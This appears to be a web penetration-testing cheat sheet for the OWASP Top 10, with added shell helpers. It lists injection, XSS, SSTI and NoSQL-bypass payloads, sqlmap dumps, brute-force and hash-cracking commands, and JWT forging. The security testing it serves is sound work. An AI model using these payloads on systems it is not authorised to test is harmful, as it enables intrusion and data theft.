Comprehensive toolkit for testing OWASP Top 10 vulnerabilities: scanners, browser extensions, proxies, fuzzers, and CLI tools with practical commands for access control testing, crypto analysis, injection detection, misconfig discovery, and more—safe testing only.
Burp Suite (Proxy/Repeater/Intruder)
- Intercept and modify requests
- Change IDs, parameters, tokens
# Community Edition (free)
# Professional features: Intruder, Scanner
# Manual test: capture a request, send it to Repeater, change the user_id parameter, and compare status code and body with the legitimate response
OWASP ZAP (Zed Attack Proxy)
- Free alternative to Burp
zap.sh -daemon -port 8080 -config api.disablekey=true # API key disabled: lab hosts only, anything that can reach port 8080 can then drive the proxy
# Or GUI mode: zap.sh
Burp Extensions
- Autorize: Automated authorization testing
- AuthMatrix: Test multiple users/roles
- Burp Bounty: Custom scan profiles
Browser Extensions
- Wappalyzer: Identify technologies
- Cookie-Editor: View/modify cookies
- EditThisCookie: Similar cookie manager
Manual Testing
# Change URL parameters (IDOR): request your own object, then a neighbouring ID with the same token, and compare status and body
curl -s -o /dev/null -w '%{http_code}\n' "https://example.com/api/user/123" -H "Authorization: Bearer YOUR_TOKEN"
curl -s -o /dev/null -w '%{http_code}\n' "https://example.com/api/user/124" -H "Authorization: Bearer YOUR_TOKEN"
# Test different HTTP methods (a GET that is denied may still be allowed as PUT/PATCH/DELETE)
curl -X DELETE "https://example.com/api/user/123" -H "Authorization: Bearer YOUR_TOKEN"
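The two curl lines above are one ID apart; the added shell example below (not part of the original page) turns that into a differential sweep. It assumes a hypothetical endpoint template with a literal ID placeholder, a bearer token for a low-privilege account that owns only OWN_ID, and it reports every other ID that answers 200 to that token. The transport is a hook (HTTP_GET) so the logic can be exercised without a target.

```bash
#!/usr/bin/env bash
# Added example: differential IDOR sweep. Not from the original page.
# Assumptions: objects live at URL_TEMPLATE with "ID" as placeholder
# (e.g. https://example.com/api/user/ID), the token belongs to an account
# that legitimately owns only OWN_ID, and a 200 on any other ID is a finding.

# Transport hook: real runs use curl; tests can point HTTP_GET at a stub.
http_get_curl() { # $1 = url, $2 = bearer token -> prints the HTTP status code
    curl -s -o /dev/null -m 10 -w '%{http_code}' -H "Authorization: Bearer $2" "$1"
}
HTTP_GET=${HTTP_GET:-http_get_curl}

# idor_sweep TEMPLATE TOKEN OWN_ID FROM TO -> one "id status" line per id
idor_sweep() {
    local tmpl=$1 token=$2 from=$4 to=$5 id url status
    for id in $(seq "$from" "$to"); do
        url=$(printf '%s' "$tmpl" | sed "s/ID/$id/")
        status=$("$HTTP_GET" "$url" "$token")
        printf '%s %s\n' "$id" "$status"
    done
}

# idor_findings TEMPLATE TOKEN OWN_ID FROM TO -> ids other than OWN_ID that returned 200
idor_findings() {
    local own=$3
    idor_sweep "$@" | awk -v own="$own" '$2 == 200 && $1 != own { print $1 }'
}

# Against a real target (replace the placeholders, keep the range inside scope):
# idor_findings "https://example.com/api/user/ID" "$TOKEN" 123 100 200
```

Run it once per role (anonymous, low-privilege user, admin); an ID that is readable by the low-privilege token but belongs to someone else is the Broken Access Control finding, and the status-only comparison keeps the sweep cheap enough to cover a few thousand IDs.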
# Manipulate JWT tokens
# Decode the JWT payload: it is the second dot-separated segment, base64url-encoded without padding, so translate the alphabet before base64 -d (the trailing "invalid input" complaint about missing padding is harmless)
echo "eyJhbGc..." | cut -d. -f2 | tr '_-' '/+' | base64 -d 2>/dev/null; echo
Specialized Tools
- jwt_tool: JWT manipulation
python3 jwt_tool.py <JWT_TOKEN>
python3 jwt_tool.py <JWT_TOKEN> -T # Tamper payload interactively: edit claims such as sub or role, then re-sign or strip the signature
- Postman/Insomnia: API testing
- Create collections with different user tokens
- Test same endpoints with different credentials
SSL/TLS Testing
SSLScan
sslscan example.com:443
sslscan --show-certificate example.com:443
TestSSL.sh (comprehensive)
./testssl.sh https://example.com
./testssl.sh --vulnerable example.com # Check known vulnerabilities
./testssl.sh --protocols example.com # Protocol support
Nmap SSL Scripts
nmap --script ssl-enum-ciphers -p 443 example.com
nmap --script ssl-cert -p 443 example.com
nmap --script ssl-heartbleed -p 443 example.com
SSLyze
sslyze example.com
sslyze --regular example.com # sslyze 2.x only; in 3.x the default run already includes these checks
sslyze --heartbleed example.com
Certificate Analysis
# View certificate chain (-servername sends SNI so the right vhost certificate is returned; </dev/null closes the session instead of hanging on stdin)
openssl s_client -connect example.com:443 -servername example.com </dev/null
# Check certificate expiry
openssl s_client -connect example.com:443 -servername example.com </dev/null 2>/dev/null | openssl x509 -noout -dates
# Check whether a specific weak cipher suite is still accepted (a handshake failure is the desired outcome)
openssl s_client -connect example.com:443 -servername example.com -cipher 'DES-CBC3-SHA' </dev/null
Browser Extensions
- HTTPS Everywhere: Force HTTPS (retired by the EFF; current browsers ship an HTTPS-only mode that does the same job)
- Certificate Patrol: Monitor cert changes (legacy add-on, no longer maintained)
- SSL Labs Browser Check: Quick SSL test
Online Tools
- SSL Labs (Qualys): https://www.ssllabs.com/ssltest/
- Security Headers: https://securityheaders.com/
Secret Scanning
TruffleHog (Find secrets in Git repos)
trufflehog git https://github.com/user/repo --only-verified
trufflehog filesystem /path/to/project
GitLeaks
gitleaks detect --source . --verbose
gitleaks protect --staged # Pre-commit hook
detect-secrets
detect-secrets scan > .secrets.baseline
detect-secrets audit .secrets.baseline
Manual Checks
# Search for API keys in JS files (print the match plus a little context so real keys stand out from variable names)
curl -s https://example.com/app.js | grep -oiE "(api[_-]?key|secret|token|password)[^,;)]{0,80}"
# Check for hardcoded credentials in source
grep -rnE "password\s*=\s*['\"]" /path/to/code
# Find exposed .env files and repository metadata (a 200 with key=value lines or a [core] section is a finding)
curl -si https://example.com/.env | head -20
curl -si https://example.com/.git/config | head -20
SQL Injection
SQLMap (automated)
# Basic scan
sqlmap -u "https://example.com/page?id=1"
# With cookie/auth
sqlmap -u "https://example.com/page?id=1" --cookie="PHPSESSID=abc123"
# POST request
sqlmap -u "https://example.com/login" --data="user=admin&pass=test"
# Enumerate databases
sqlmap -u "https://example.com/page?id=1" --dbs
# Dump specific table
sqlmap -u "https://example.com/page?id=1" -D database -T users --dump
# From Burp request file
sqlmap -r request.txt --batch # --batch accepts every default prompt, so confirm scope first: sqlmap will probe every parameter in the file
Manual SQL Injection Testing
# Test for error-based SQLi (curl does not encode spaces or quotes in the URL, so pass payloads through --data-urlencode with -G)
curl -G --data-urlencode "id=1'" "https://example.com/page"
curl -G --data-urlencode "id=1' OR '1'='1" "https://example.com/page"
# Union-based (MySQL needs a space after the comment marker, hence "-- -")
curl -G --data-urlencode "id=1 UNION SELECT NULL-- -" "https://example.com/page"
# Time-based blind: compare wall-clock time against the baseline request
curl -G -o /dev/null -w '%{time_total}\n' --data-urlencode "id=1' AND SLEEP(5)-- -" "https://example.com/page"
# Boolean-based blind: diff the body against a false condition such as '1'='2'
curl -G --data-urlencode "id=1' AND '1'='1" "https://example.com/page"
Burp Extensions
- SQLiPy: SQL injection scanner
- CO2: SQLMap integration
Command Injection
Commix (automated)
# Basic scan
commix -u "https://example.com/ping?ip=127.0.0.1"
# With cookie
commix -u "https://example.com/exec?cmd=ls" --cookie="SESSION=xyz"
# POST data
commix --data="ip=127.0.0.1" -u "https://example.com/ping"
Manual Testing
# Basic command injection payloads. Keep the payload in single quotes: inside double quotes the local shell runs `id` and $(whoami) on your own machine before curl ever sees them
curl -G --data-urlencode 'ip=127.0.0.1;whoami' "https://example.com/ping"
curl -G --data-urlencode 'ip=127.0.0.1|ls' "https://example.com/ping"
curl -G --data-urlencode 'ip=127.0.0.1`id`' "https://example.com/ping"
curl -G --data-urlencode 'ip=127.0.0.1$(whoami)' "https://example.com/ping"
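The manual SQL injection, command injection and XSS payloads above all contain characters that are either shell metacharacters or reserved in URLs. The added example below (not from the original page) is a byte-wise percent-encoder in plain shell, for building test URLs that can be pasted into a browser, Repeater or a wordlist; the base URL, parameter names and payloads in the demo calls are illustrative.

```bash
#!/usr/bin/env bash
# Added example: percent-encode a payload byte by byte so that ; | ` $ ' " < > and
# spaces reach the target intact and nothing is evaluated by the local shell.
# Not from the original page; uses only od, printf and tr.

urlencode() { # $1 = raw string -> percent-encoded string on stdout (no newline)
    local byte out=""
    # od turns the input into one hex byte per word, so multi-byte UTF-8 is encoded per byte
    for byte in $(printf '%s' "$1" | od -An -tx1 -v); do
        case $byte in
            # RFC 3986 unreserved set: 0-9 A-Z a-z - . _ ~ pass through unchanged
            3[0-9]|4[1-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]|2[de]|5f|7e)
                out="$out$(printf "\\$(printf '%03o' "0x$byte")")" ;;
            *)
                out="$out%$(printf '%s' "$byte" | tr 'a-f' 'A-F')" ;;
        esac
    done
    printf '%s' "$out"
}

# build_url BASE PARAM RAW_PAYLOAD -> full test URL with the payload encoded
build_url() {
    printf '%s?%s=%s\n' "$1" "$2" "$(urlencode "$3")"
}

# Demo on the payloads from the manual tests (hypothetical endpoints):
build_url "https://example.com/ping"   ip '127.0.0.1;whoami'
build_url "https://example.com/page"   id "1' OR '1'='1"
build_url "https://example.com/search" q  '<script>alert(1)</script>'
```

For a single request `curl -G --data-urlencode` does the same job; the function earns its keep when you need the encoded form itself, for example to feed a list of payloads to ffuf or Intruder, or to double-encode (`urlencode "$(urlencode "$p")"`) against a filter that decodes once.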
# Same payload URL-encoded by hand (%3B is ';'), for pasting into a browser or Burp Repeater
curl "https://example.com/ping?ip=127.0.0.1%3Bwhoami"
NoSQL Injection
NoSQLMap
python nosqlmap.py -u "https://example.com/login" --data="username=admin&password=test"
Manual NoSQL Testing
# MongoDB injection (JSON)
curl -X POST "https://example.com/api/login" \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": null}, "password": {"$ne": null}}'
# Authentication bypass: {"$gt": ""} matches any non-empty password, so a 200 or a redirect to the dashboard instead of a 401 confirms operator injection
curl -X POST "https://example.com/api/login" \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$gt": ""}}'
XSS (Cross-Site Scripting) - often grouped with injection
XSStrike
python xsstrike.py -u "https://example.com/search?q=test"
python xsstrike.py -u "https://example.com/page" --data "name=test&comment=test"
Dalfox
dalfox url "https://example.com/search?q=test"
dalfox file urls.txt
Manual XSS Testing
# Reflected XSS: curl only shows whether the payload comes back unencoded; confirm execution in a browser, because the reflection context (HTML body, attribute, JS string) decides which payload actually fires
curl -G --data-urlencode 'q=<script>alert(1)</script>' "https://example.com/search" | grep -o '<script>alert(1)</script>'
# Test with different payloads (attribute and event-handler variants survive filters that only strip <script>)
curl -G --data-urlencode 'q=<img src=x onerror=alert(1)>' "https://example.com/search"
curl -G --data-urlencode "q='><svg/onload=alert(1)>" "https://example.com/search"
LDAP Injection
# Manual testing: the username closes the application's (&(uid=USER)(userPassword=PASS)) filter early and appends an always-true branch
# Username: *)(uid=*))(|(uid=*
# Password: anything
Template Injection (SSTI)
tplmap
python tplmap.py -u "https://example.com/page?name=test"
Manual SSTI Testing
# Jinja2/Flask (49 in the response means the expression was evaluated server-side)
curl -G --data-urlencode 'name={{7*7}}' "https://example.com/page"
curl -G --data-urlencode 'name={{config}}' "https://example.com/page" # dumps the Flask config, including SECRET_KEY
# Twig (tells the engines apart: Twig evaluates {{7*'7'}} to 49, Jinja2 repeats the string to 7777777)
curl -G --data-urlencode "name={{7*'7'}}" "https://example.com/page"
# FreeMarker (this runs `id` on the server: authorised targets only)
curl -G --data-urlencode "name=<#assign ex='freemarker.template.utility.Execute'?new()>\${ex('id')}" "https://example.com/page"
Business Logic Testing (mostly manual)
Burp Suite
- Repeater: Test state changes, race conditions
- Intruder: Fuzz numeric values (negative numbers, large values)
- Turbo Intruder: Race condition testing
Race Condition Testing
Turbo Intruder (Burp Extension)
# Example script for race conditions: requests are queued behind a gate and released together so they reach the server in the same instant
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False)
    for i in range(30):
        engine.queue(target.req, gate='race1')
    # open the gate only once every request has been staged
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    # Turbo Intruder requires this callback; add every response to the results table
    table.add(req)
Manual Race Testing
# Send near-simultaneous requests (less precise than the gated Turbo Intruder script, but enough to catch double-spend on slow handlers)
for i in {1..10}; do
curl -s -o /dev/null -w "%{http_code}\n" -X POST "https://example.com/api/transfer" \
-H "Cookie: session=xyz" \
-d "amount=100&to=attacker" &
done
wait
# More than one 200 for a balance that only covered a single transfer is the finding
Manual Testing Checklist
# Test negative quantities
curl -X POST "https://example.com/api/cart" \
-d "item_id=123&quantity=-5"
# Test price manipulation
curl -X POST "https://example.com/api/checkout" \
-d "item_id=123&price=0.01"
# Skip workflow steps
# 1. Capture multi-step flow in Burp
# 2. Jump directly to step 3, skipping step 2 verification (e.g. call the order-completion endpoint without ever calling payment confirmation)
Tools for Rate Limit Testing
# ffuf for testing rate limits: ffuf needs a FUZZ keyword, so feed a list of addresses and watch whether the status ever changes to 429 or the responses slow down
ffuf -u "https://example.com/api/register" \
-X POST \
-H "Content-Type: application/json" \
-w emails.txt \
-d '{"email":"FUZZ"}' \
-rate 100 -mc all
# Check if CAPTCHA can be bypassed (submit without the CAPTCHA token; a 200 means it is only enforced client-side)
curl -X POST "https://example.com/api/register" \
-d "email=test@example.com" # Without CAPTCHA token
Directory/File Enumeration
Dirb
dirb https://example.com
dirb https://example.com /usr/share/wordlists/dirb/common.txt
dirb https://example.com -o output.txt
Dirbuster (GUI)
dirbuster
# Select target, wordlist, and start
Gobuster
# Directory brute force
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
# DNS subdomain enumeration
gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt
# With extensions
gobuster dir -u https://example.com -w wordlist.txt -x php,txt,html,bak
# With cookies/auth
gobuster dir -u https://example.com -w wordlist.txt -c "SESSION=xyz"
Feroxbuster (modern, fast)
feroxbuster -u https://example.com -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u https://example.com -x php,txt,bak --depth 2
ffuf (versatile fuzzer)
# Directory fuzzing
ffuf -u https://example.com/FUZZ -w wordlist.txt
# Virtual host discovery
ffuf -u https://example.com -H "Host: FUZZ.example.com" -w subdomains.txt
# Parameter fuzzing
ffuf -u https://example.com/page?FUZZ=value -w params.txt
# Filter by status code
ffuf -u https://example.com/FUZZ -w wordlist.txt -fc 404
Configuration Scanners
Nikto (web server scanner)
nikto -h https://example.com
nikto -h https://example.com -o report.html -Format html
nikto -h https://example.com -Tuning 123 # Specific test categories (digits run together, not space-separated)
WhatWeb
whatweb https://example.com
whatweb -v https://example.com # Verbose
whatweb -a 3 https://example.com # Aggressive
Wapiti (web app vulnerability scanner)
wapiti -u https://example.com
wapiti -u https://example.com -m "backup,htaccess"
Check Security Headers
curl -sI https://example.com
# Look for missing headers:
# - Strict-Transport-Security
# - X-Content-Type-Options
# - X-Frame-Options (or a Content-Security-Policy frame-ancestors directive, which supersedes it)
# - Content-Security-Policy
# - X-XSS-Protection (legacy; current browsers ignore it, so its absence alone is not a finding)
Online Tools
- Security Headers: https://securityheaders.com/
- Mozilla Observatory: https://observatory.mozilla.org/
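The header checklist above is easy to eyeball once, but tedious across dozens of hosts. The added shell example below (not from the original page) reads raw response headers on stdin, so it works on `curl -sI` output or a saved capture, and reports missing or weak values. The two header blocks at the bottom are constructed samples, not captures from a real site, and the 6-month HSTS threshold is the preload-list minimum.

```bash
#!/usr/bin/env bash
# Added example: grade a raw HTTP response header block. Not from the original page.
# Usage: curl -sI https://example.com | check_headers

check_headers() { # stdin: response headers -> one finding per line; exit 1 if any finding
    local hdrs findings="" age
    hdrs=$(tr -d '\r' | tr 'A-Z' 'a-z')            # normalise line endings and case
    has() { printf '%s\n' "$hdrs" | grep -q "^$1:"; }
    val() { printf '%s\n' "$hdrs" | grep "^$1:" | head -1 | cut -d: -f2- | sed 's/^ *//'; }

    if has strict-transport-security; then
        case $(val strict-transport-security) in
            *max-age=[0-9]*)
                age=$(val strict-transport-security | sed 's/.*max-age=\([0-9]*\).*/\1/')
                # below 6 months (15552000 s) the policy is too short for the preload list
                [ "$age" -ge 15552000 ] || findings="$findings WEAK:HSTS-max-age=$age" ;;
            *) findings="$findings WEAK:HSTS-no-max-age" ;;
        esac
    else
        findings="$findings MISSING:HSTS"
    fi
    has content-security-policy || findings="$findings MISSING:CSP"
    case $(val content-security-policy) in
        *unsafe-inline*|*unsafe-eval*) findings="$findings WEAK:CSP-unsafe-directive" ;;
    esac
    if ! has x-frame-options; then
        case $(val content-security-policy) in
            *frame-ancestors*) ;;                    # CSP frame-ancestors supersedes X-Frame-Options
            *) findings="$findings MISSING:X-Frame-Options" ;;
        esac
    fi
    has x-content-type-options || findings="$findings MISSING:X-Content-Type-Options"
    # version banners are information disclosure, not a missing control, so tag them INFO
    if has server; then case $(val server) in *[0-9].[0-9]*) findings="$findings INFO:Server-version-banner" ;; esac; fi
    if has x-powered-by; then findings="$findings INFO:X-Powered-By"; fi

    [ -n "$findings" ] && printf '%s\n' $findings
    [ -z "$findings" ]
}

# Constructed sample: a typical unhardened PHP host
HEADERS_WEAK=$(cat <<'EOF'
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/7.4.3
Content-Type: text/html
Strict-Transport-Security: max-age=300
Content-Security-Policy: default-src 'self' 'unsafe-inline'
EOF
)
# Constructed sample: hardened response
HEADERS_GOOD=$(cat <<'EOF'
HTTP/2 200
strict-transport-security: max-age=63072000; includeSubDomains; preload
content-security-policy: default-src 'self'; frame-ancestors 'none'
x-content-type-options: nosniff
content-type: text/html
EOF
)

if ! printf '%s\n' "$HEADERS_WEAK" | check_headers; then
    echo "(weak sample failed the check, as expected)"
fi
```

The exit status makes it usable as a gate in CI or in a loop over a host list (`while read h; do curl -sI "https://$h" | check_headers || echo "$h"; done < hosts.txt`).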
Default Credential Testing
Hydra (brute force - use only authorized)
# HTTP basic auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-get /admin
# HTTP POST form
hydra -l admin -P passwords.txt example.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
# SSH
hydra -l root -P passwords.txt ssh://example.com
# FTP
hydra -l admin -P passwords.txt ftp://example.com
Medusa
medusa -h example.com -u admin -P passwords.txt -M http
medusa -h example.com -U users.txt -P passwords.txt -M ssh
Git/SVN Exposure
GitTools
# Download exposed .git
./gitdumper.sh https://example.com/.git/ output/
# Extract commits
./extractor.sh output/ extracted/
git-dumper
git-dumper https://example.com/.git/ output/
Manual checks
curl https://example.com/.git/HEAD
curl https://example.com/.git/config
curl https://example.com/.svn/entries
curl https://example.com/.env
curl https://example.com/config.php.bak
Cloud Misconfig
S3Scanner
python s3scanner.py --bucket bucketname
python s3scanner.py --bucket-file buckets.txt
AWS CLI
# List S3 bucket contents (if public)
aws s3 ls s3://bucketname --no-sign-request
# Download entire bucket
aws s3 sync s3://bucketname . --no-sign-request
Bucket Stream (find buckets)
python bucket-stream.py
Dependency Scanners
OWASP Dependency-Check
dependency-check --project "MyApp" --scan /path/to/project
dependency-check --project "MyApp" --scan . --format HTML --out report.html
Retire.js (JavaScript libraries)
# CLI
retire --path /path/to/project
# Browser extension available for Chrome/Firefox
npm audit (Node.js)
npm audit
npm audit fix # Auto-fix
npm audit --json > audit.json
pip-audit (Python)
pip-audit
pip-audit --requirement requirements.txt
Safety (Python)
safety check # legacy command; Safety 3 replaces it with: safety scan
safety check --file requirements.txt
safety check --json
Snyk (multi-language)
snyk test
snyk test --file=package.json
snyk monitor # Continuous monitoring
Trivy (containers & dependencies)
trivy fs /path/to/project
trivy image nginx:latest
trivy repo https://github.com/user/repo
Version Detection
Wappalyzer (browser extension)
- Identifies frameworks, libraries, versions
BuiltWith (online)
WhatWeb
whatweb -v https://example.com
Nmap version detection
nmap -sV example.com
nmap -sV -p 80,443 example.com
Manual checks
# Check response headers
curl -I https://example.com
# Look for version in HTML/JS
curl -s https://example.com | grep -i "version\|jquery\|angular\|react"
# Check specific library endpoints (the version banner is usually in the first line of the file)
curl -s https://example.com/jquery.js | head -1
curl -s https://example.com/js/app.js | grep -oE "version[^,;]{0,40}"
WordPress/CMS Scanners
WPScan (WordPress)
wpscan --url https://example.com
wpscan --url https://example.com --enumerate vp # Vulnerable plugins
wpscan --url https://example.com --enumerate u # Users
wpscan --url https://example.com --api-token YOUR_TOKEN # With vuln DB
Joomscan (Joomla)
joomscan -u https://example.com
Droopescan (Drupal, WordPress, SilverStripe, Moodle)
droopescan scan drupal -u https://example.com
droopescan scan wordpress -u https://example.com
Password Brute Force
Hydra
# HTTP form-based login
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"
# With a fixed session cookie (hydra cannot fetch a fresh per-request CSRF token; for that use Burp Intruder with a recursive grep payload, or a small script)
hydra -l admin -P passwords.txt example.com http-post-form "/login:username=^USER^&password=^PASS^:F=Login failed:H=Cookie: security=low; PHPSESSID=xyz"
Patator
patator http_fuzz url="https://example.com/login" method=POST \
body='username=FILE0&password=FILE1' 0=users.txt 1=passwords.txt \
-x ignore:fgrep='Login failed'
Session Analysis
Burp Suite
- Sequencer: Analyze session token randomness
- Send token to Sequencer
- Capture 100+ tokens
- Analyze entropy
Manual session testing
# Check if old session still works after logout
# 1. Login and capture session cookie
# 2. Logout
# 3. Replay request with old session
curl https://example.com/profile -H "Cookie: SESSION=old_token"
# Test session fixation
# 1. Get session before login
# 2. Login with that session
# 3. Check if session ID changed
JWT Analysis
jwt_tool
# Analyze token
python3 jwt_tool.py eyJhbGc...
# Test for common vulnerabilities
python3 jwt_tool.py eyJhbGc... -M at # All tests
# Crack weak secret
python3 jwt_tool.py eyJhbGc... -C -d wordlist.txt
# Tamper claims
python3 jwt_tool.py eyJhbGc... -T
John the Ripper (password cracking)
# Crack password hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# With rules
john --wordlist=wordlist.txt --rules hashes.txt
# Show cracked
john --show hashes.txt
Hashcat
# MD5
hashcat -m 0 -a 0 hashes.txt wordlist.txt
# SHA-256
hashcat -m 1400 -a 0 hashes.txt wordlist.txt
# bcrypt
hashcat -m 3200 -a 0 hashes.txt wordlist.txt
# NTLM
hashcat -m 1000 -a 0 hashes.txt wordlist.txt
Multi-Factor Authentication Testing
Manual checks:
# Test if MFA can be bypassed by going directly to post-login page
curl https://example.com/dashboard -H "Cookie: SESSION=token_before_mfa"
# Test backup codes
# - Are they rate-limited?
# - Can they be reused?
# - Are they logged?
# SMS/TOTP testing
# - Intercept and replay codes
# - Test code expiration
# - Test if same code works multiple times
Browser Extensions
- Cookie-Editor: Manipulate session cookies
- JWT Debugger: Decode/verify JWTs
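The manual JWT decode step in the access-control section and the jwt_tool checks above (decode, crack a weak HS256 secret, tamper claims) can be reproduced with coreutils and openssl. The added example below is not from the original page or from jwt_tool; SAMPLE_TOKEN is the public jwt.io demo token (HS256, secret "your-256-bit-secret"), and every claim value and secret in it is test data.

```bash
#!/usr/bin/env bash
# Added example: decode, verify, crack and forge JWTs in shell. Not from the original page.
# Needs: base64, cut, tr, openssl. All sample values are test data.

b64url_decode() { # stdin: base64url without padding -> raw bytes
    local s pad
    s=$(tr '_-' '/+')
    pad=$(( (4 - ${#s} % 4) % 4 ))
    [ "$pad" -eq 3 ] && pad=0            # length 4n+1 is never valid base64; let base64 reject it
    while [ "$pad" -gt 0 ]; do s="$s="; pad=$((pad - 1)); done
    printf '%s' "$s" | base64 -d
}
b64url_encode() { base64 | tr -d '\n=' | tr '/+' '_-'; }   # stdin raw bytes -> base64url

jwt_part()    { printf '%s' "$1" | cut -d. -f"$2"; }        # 1=header 2=payload 3=signature
jwt_header()  { jwt_part "$1" 1 | b64url_decode; }
jwt_payload() { jwt_part "$1" 2 | b64url_decode; }

# jwt_verify_hs256 TOKEN SECRET -> exit 0 when HMAC-SHA256(header.payload) matches the signature
jwt_verify_hs256() {
    local expected
    expected=$(printf '%s.%s' "$(jwt_part "$1" 1)" "$(jwt_part "$1" 2)" \
        | openssl dgst -sha256 -hmac "$2" -binary | b64url_encode)
    [ "$expected" = "$(jwt_part "$1" 3)" ]
}

# jwt_sign_hs256 PAYLOAD_JSON SECRET -> freshly signed token (what you do after cracking the secret)
jwt_sign_hs256() {
    local h p sig
    h=$(printf '%s' '{"alg":"HS256","typ":"JWT"}' | b64url_encode)
    p=$(printf '%s' "$1" | b64url_encode)
    sig=$(printf '%s.%s' "$h" "$p" | openssl dgst -sha256 -hmac "$2" -binary | b64url_encode)
    printf '%s.%s.%s' "$h" "$p" "$sig"
}

# jwt_forge_none PAYLOAD_JSON -> alg=none token with an empty signature;
# a server that accepts it (200 instead of 401) is not pinning the algorithm
jwt_forge_none() {
    printf '%s.%s.' "$(printf '%s' '{"alg":"none","typ":"JWT"}' | b64url_encode)" \
                    "$(printf '%s' "$1" | b64url_encode)"
}

# jwt_crack TOKEN WORDLIST -> prints the secret that verifies, exit 1 if none does
jwt_crack() {
    local w
    while IFS= read -r w; do
        jwt_verify_hs256 "$1" "$w" && { printf '%s\n' "$w"; return 0; }
    done < "$2"
    return 1
}

SAMPLE_TOKEN='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c'
jwt_header "$SAMPLE_TOKEN"; echo
jwt_payload "$SAMPLE_TOKEN"; echo
```

Cracking order matters: run `jwt_crack` only against tokens whose header says HS256 (or whose signature length is 43 characters); a rockyou-sized list through openssl in a shell loop is slow, so hand anything that survives a short list to hashcat mode 16500 or jwt_tool -C.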
Deserialization
ysoserial (Java)
# Generate payload (on a real target use a harmless, observable command such as a DNS lookup to a domain you control rather than calc.exe)
java -jar ysoserial.jar CommonsCollections6 'calc.exe' > payload.ser
# Base64 encode for insertion (-w0 keeps it on one line)
base64 -w0 payload.ser
phpggc (PHP)
# List available gadgets
./phpggc -l
# Generate payload
./phpggc Laravel/RCE1 system id
# Base64 output
./phpggc -b Laravel/RCE1 system id
Detection
# Look for serialized data patterns in cookies/parameters
# Java: rO0 (base64 of the stream magic 0xAC 0xED); the raw stream starts AC ED 00 05, so in parameters it is always base64 or hex encoded
# PHP: a:, O:, s: (base64: YTo, Tzo)
# Python pickle: \x80 (protocol 2 and later) or starts with ( (protocol 0)
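The signature list above, as an added shell example that is not part of the original page: detect_serialized classifies a single value, and scan_cookies runs it over Set-Cookie lines from a response. The sample headers at the bottom are constructed (the PHP cookie is base64 of a:1:{s:4:"role";s:5:"admin";}, the Java one is the truncated base64 prefix of a HashMap stream).

```bash
#!/usr/bin/env bash
# Added example: spot serialized objects in cookie/parameter values. Not from the original page.

detect_serialized() { # $1 = value -> java-base64 | php | php-base64 | python-pickle | python-pickle-base64 | none
    local v=$1 hex
    hex=$(printf '%s' "$v" | head -c 4 | od -An -tx1 | tr -d ' \n')   # first bytes as hex
    case $hex in
        80*) printf 'python-pickle\n'; return ;;     # PROTO opcode of pickle protocol 2+
    esac
    case $v in
        rO0AB*)                                    printf 'java-base64\n' ;;           # base64("\xac\xed\x00\x05")
        "a:"[0-9]*":{"*|"O:"[0-9]*':"'*|"s:"[0-9]*':"'*) printf 'php\n' ;;             # PHP serialize() array/object/string
        YTo*|Tzo*)                                 printf 'php-base64\n' ;;            # base64 of "a:" / "O:"
        "("*)                                      printf 'python-pickle\n' ;;         # protocol 0 starts with MARK
        gA*)                                       printf 'python-pickle-base64\n' ;;  # base64 prefix of \x80 (weaker signal)
        *)                                         printf 'none\n' ;;
    esac
}

# scan_cookies: stdin = response headers -> "name kind" for every Set-Cookie whose value looks serialized
scan_cookies() {
    local line name value kind
    while IFS= read -r line; do
        case $line in [Ss]et-[Cc]ookie:*) ;; *) continue ;; esac
        name=$(printf '%s' "$line" | sed 's/^[^:]*: *//; s/=.*//')
        value=$(printf '%s' "$line" | sed 's/^[^:]*: *[^=]*=//; s/;.*//')
        kind=$(detect_serialized "$value")
        if [ "$kind" != none ]; then printf '%s %s\n' "$name" "$kind"; fi
    done
}

# Constructed sample response
SAMPLE_HEADERS=$(cat <<'EOF'
HTTP/1.1 200 OK
Set-Cookie: sessid=YToxOntzOjQ6InJvbGUiO3M6NToiYWRtaW4iO30=; Path=/
Set-Cookie: prefs=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA; HttpOnly
Set-Cookie: theme=dark
EOF
)
printf '%s\n' "$SAMPLE_HEADERS" | scan_cookies
```

Feed it live output with `curl -sD - -o /dev/null https://example.com | scan_cookies`; a hit on a PHP or Java value is the cue to reach for phpggc or ysoserial, and on a pickle value to check whether the application ever unpickles client data at all.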
# Check cookies (Set-Cookie values are where serialized session blobs usually travel)
curl -sI https://example.com | grep -i set-cookie
# Check parameters
# Burp: Search responses for serialization patterns
Subresource Integrity (SRI) Checking
Manual check
# View page source and check for integrity attributes
curl -s https://example.com | grep -i "integrity="
# Should see:
# <script src="https://cdn.example.com/lib.js"
# integrity="sha384-abc123..."
# crossorigin="anonymous"></script>
Generate SRI hash
curl -s https://cdn.example.com/lib.js | openssl dgst -sha384 -binary | openssl base64 -A # prefix the output with "sha384-" in the integrity attribute
Supply Chain / CI/CD Testing
TruffleHog (scan repos for secrets)
trufflehog git https://github.com/user/repo
trufflehog github --org=orgname
Gitleaks
gitleaks detect --source . --report-path report.json
Checkov (IaC security)
checkov -d /path/to/iac
checkov -f Dockerfile
Manual CI/CD checks
# Check if .git is exposed
curl https://example.com/.git/config
# Check CI config files
curl https://example.com/.gitlab-ci.yml
curl https://example.com/.github/workflows/deploy.yml
# Look for:
# - Hardcoded secrets
